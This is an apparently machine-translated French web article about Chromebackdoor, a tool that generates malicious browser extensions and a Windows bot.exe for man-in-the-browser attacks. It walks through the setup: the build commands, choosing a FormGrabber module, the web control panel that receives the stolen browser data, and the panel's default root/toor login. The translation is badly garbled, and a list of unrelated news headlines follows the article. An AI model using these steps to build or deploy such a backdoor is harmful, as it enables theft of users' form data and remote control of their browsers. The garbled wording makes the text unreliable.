Chromebackdoor: outil de porte dérobée basé sur les principaux navigateurs

projet d'accueil

https://github.com/graniet/chromebackdoor

brève introduction

Chromebackdoor est un outil de test de pénétration, l'outil utilise des techniques MITB pour générer des exécutables pour Windows « .exe », le programme commencera avec extensions de plug-in malveillants, ou exécuter un supports de script principaux navigateurs, DOM et envoyer toutes les données pour exécuter des commandes contrôle.

installer

Exigences environnementales:

  • pip installer crxmake
  • wine32
python chromebackdoor.py

installer web

1) de décompression généré chromebackdook

Décompressez folder.zip

2) transférer le dossier vers le serveur Web 3) créer une base de données et l'utilisateur, mettre à jour le chemin d'accès correspondant fichier de configuration

/web/includes/config.php

4) base de données fichier d'importation .SQL

/SQL/chromebackdoor.sql

5) Panneau Web Log (web / index.php)

nom d'utilisateur = racine password = Toor

Création d'un hôte (et non par .exe)

Et Python chromebackdoor.py monté confiance

python chromebackdoor.py

Vous pouvez générer une porte arrière au grand navigateur grand public. Par exemple, Google Chrome:

python chromebackdoor.py --chrome

Ensuite, vous devez entrer le nom de domaine (requiert SSL):

Site Web hébergé (https: // localhost /) https://lynxframework.com/?

Relais (nécessite SSL):

L'information correcte ? Y

module de sélection (par exemple FormGrabber V1.0)

S'il vous plaît sélectionner des numéros? 2

Le script génère porte arrière .crx de .perm et dossiers

Construction de .exe

1) en utilisant les paramètres --build

python chromebackdoor.py --build

2) Sélectionner la porte arrière (par exemple - Chrome)

Crx FIME (/ root / ..)? /Root/backdoor.crx

3) le vin commence installer.exe générer bot.exe

Générer succès: {} chromebackdoor_folder /bot.exe

4) Lancer bot.exe interface de contrôle Web avec la fin de Windows:

* Traduction: seebug, tiré à part MottoIN
Originator débuts sorcière, Harry Potter ont également appeler sa pipe de grand-mère
Précédent
Deshi homme intelligent est de savoir comment protéger votre serrures sécurité de la famille?
Prochain
ancien employé étoiles R reprend confirmé « GTA6 » développe la prochaine génération peut voir!
Rappelez-vous une traçabilité des opérations de chantage nue, téléphone réparation attention à des chevaux de Troie implantés (__gVirt_NP_NN_NNPS<__ rpm)
L'homme a été arrêté après le jeu de possession de drogue bien: j'étais couvert d'une mission
207 personnes ont été tuées et deux Chinois ont été tués! Sri Lanka éclate un jour Les 8 explosions de ...
Hu Kun dans la chanson, série Music Master Atelier organisé par des événements musicaux passionnants
« Right Tour » manteau veilleur de nuit était effectivement exposé des instructions officielles IKEA pour la fabrication
Les pirates informatiques fuite APT 34 outils d'organisation, les informations d'appartenance, et menacé plus d'exposition continuera secrets
personnel de l'industrie de l'alimentation de formation des experts de jeu tenue du symposium dans le domaine de la production et de l'éducation parler de l'avenir de la nouvelle éducation des jeux
reality show britannique avec l'inventaire de riz! Voir prédécesseur, comme fugitifs, et un million de personnes vivent pour l'amour des applaudissements ..
Chengdu ouverture sixième grande forme physique heureux personnes âgées Jeux
action « tortue » --dns ou détournement d'avion aura une incidence sur l'économie mondiale
L'Iraq a également interdit le jeu parce que le contenu du jeu de manger du poulet trop réel